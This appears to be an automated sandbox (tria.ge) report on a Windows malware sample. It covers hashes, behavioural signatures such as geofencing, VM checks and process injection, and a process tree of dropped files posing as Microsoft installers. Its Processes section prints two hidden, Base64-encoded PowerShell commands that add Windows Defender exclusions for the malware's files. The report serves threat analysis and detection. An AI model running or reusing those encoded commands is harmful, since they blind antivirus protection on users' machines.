Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
137s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
15/02/2025, 18:56
Static task
static1
Behavioral task
behavioral1
Sample
1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe
Resource
win10v2004-20250207-en
General
-
Target
1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe
-
Size
3.8MB
-
MD5
f095f48a0fc5d1369e1e9a33f30624cf
-
SHA1
a87365138e7a92880051249411814562953a4307
-
SHA256
1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c
-
SHA512
c2707019659aeda30ad1fba0b639800a7cd966be8e55fbf5ea09b79608e5f930b99b68792f86904645616af7c30ea93587852c12c68ccc62028c296963b3a2e2
-
SSDEEP
98304:ZsFwe8EuILKpQN0f7aePKtGBz/smtrm+2f/VSnGIm+LR4ZzK:FEoO0DaFGBz/sYK+2fIGImy
Malware Config
Signatures
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF VC_redist.x86.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4424 powershell.exe 5124 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 40 1916 Process not Found -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-194335498-2604837297-537231065-1000\Control Panel\International\Geo\Nation 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe -
Executes dropped EXE 4 IoCs
pid Process 4180 VC_redist.x64.exe 3012 VC_redist.x86.exe 4556 Token.exe 3952 dotNetFx45_Full_setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4556 set thread context of 2096 4556 Token.exe 106 -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral2/files/0x0007000000023df0-2825.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VC_redist.x86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dotNetFx45_Full_setup.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1584 MicrosoftEdgeUpdate.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 4424 powershell.exe 4424 powershell.exe 3012 VC_redist.x86.exe 3012 VC_redist.x86.exe 3012 VC_redist.x86.exe 3012 VC_redist.x86.exe 3012 VC_redist.x86.exe 3012 VC_redist.x86.exe 3012 VC_redist.x86.exe 3012 VC_redist.x86.exe 4556 Token.exe 4556 Token.exe 2096 RegAsm.exe 2096 RegAsm.exe 5124 powershell.exe 5124 powershell.exe 5124 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4180 VC_redist.x64.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeDebugPrivilege 4556 Token.exe Token: SeDebugPrivilege 2096 RegAsm.exe Token: SeDebugPrivilege 3952 dotNetFx45_Full_setup.exe Token: SeDebugPrivilege 5124 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 456 wrote to memory of 4180 456 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 89 PID 456 wrote to memory of 4180 456 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 89 PID 456 wrote to memory of 3012 456 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 95 PID 456 wrote to memory of 3012 456 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 95 PID 456 wrote to memory of 3012 456 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 95 PID 4556 wrote to memory of 2096 4556 Token.exe 106 PID 4556 wrote to memory of 2096 4556 Token.exe 106 PID 4556 wrote to memory of 2096 4556 Token.exe 106 PID 4556 wrote to memory of 2096 4556 Token.exe 106 PID 4556 wrote to memory of 2096 4556 Token.exe 106 PID 4556 wrote to memory of 2096 4556 Token.exe 106 PID 456 wrote to memory of 3952 456 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 112 PID 456 wrote to memory of 3952 456 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 112 PID 456 wrote to memory of 3952 456 1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe"C:\Users\Admin\AppData\Local\Temp\1546405e25eaeb58fcef39a5baf9e6efb929a0ec0527fb923182748510b70c4c.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4180
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"2⤵
- Enumerates VirtualBox registry keys
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUABSAEUARgBFAFIARQBOAGMAZQAgAC0ARQBYAGMAbABVAHMAaQBPAE4AcABhAFQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAcABlAGMAaQBhAGwATgBhAG0AZQBcAFQAbwBrAGUAbgAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAFIAQwBFADsAIABhAEQAZAAtAG0AcABwAHIARQBmAGUAUgBlAG4AQwBlACAALQBFAFgAQwBsAHUAUwBJAE8ATgBwAHIATwBDAEUAcwBTACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAcABlAGMAaQBhAGwATgBhAG0AZQBcAFQAbwBrAGUAbgAuAGUAeABlACAALQBmAE8AcgBDAEUA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkIxQzIwREYtNkJENC00OTdDLTkyMTAtRTk3RjYyQjhBMEEyfSIgdXNlcmlkPSJ7NEY5OThCRTUtOUQ4Ni00OTAxLUE2MTctMjQ4MTA0QzI0OUY0fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7MEI4MkFGRjYtMjRDQS00MjQ1LTg0OTUtRDBEREMyMUE4MkVGfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI4IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDcxNzgiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTY4MDM3MTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MDAzNjM5MTI3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1584
-
C:\Users\Admin\AppData\Roaming\IsSpecialName\Token.exeC:\Users\Admin\AppData\Roaming\IsSpecialName\Token.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAASQBkAC4AZQB4AGUAOwA=1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5124
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
653KB
MD54f6e118ff053bda4f358922e704e6e2d
SHA1b09ee9ecb9b16910e7d5b0b151095655eac86666
SHA256c4d8a65844301bbe75699e5de0d2a576f1fa07e0cf259810bdc68b045cb14225
SHA512a78fb7027e39f29cb768cd0f6ed11ab4e56179b04b782f0f293fe0743fc88e418da8ea9698d78ff462cb650694fc4a14003537f4decb0db6313061a1afa25b4c
-
Filesize
8.2MB
MD595a8e03433879dc9bbe059a6f8ba3f5c
SHA19b15abecbc64573f9709847e22c2006a2bfec327
SHA256c09055cde3e0d6c5ebad2cf79f3e735c3ce5f5ded864130098fe2c4165b99fa1
SHA5123d1d9c0e77085258bfb834ca5d65e6aaad3a3a3a426cda50f2a6b99ad03c65b83f25a853a3a8c900aa01fe17e0a741b73bf20364006d1a16a5c21356095c49c5
-
Filesize
544KB
MD51336375cf1aaa4efdad95d0b64ea1aac
SHA19be80a505aa2dfcc4db73c8e5264ed5867533e66
SHA25604d68438f75065f5c2997e80a317b1c6fad78d723af585a64d39138861055ec6
SHA51212d91fefeb431b60b2501f7868e25dfa04eb42f94bd630b21fef4f3cd6ae5962b6764215da77824e06c53ae8d5d446b322936406396aaa178c71edf24b765f48
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82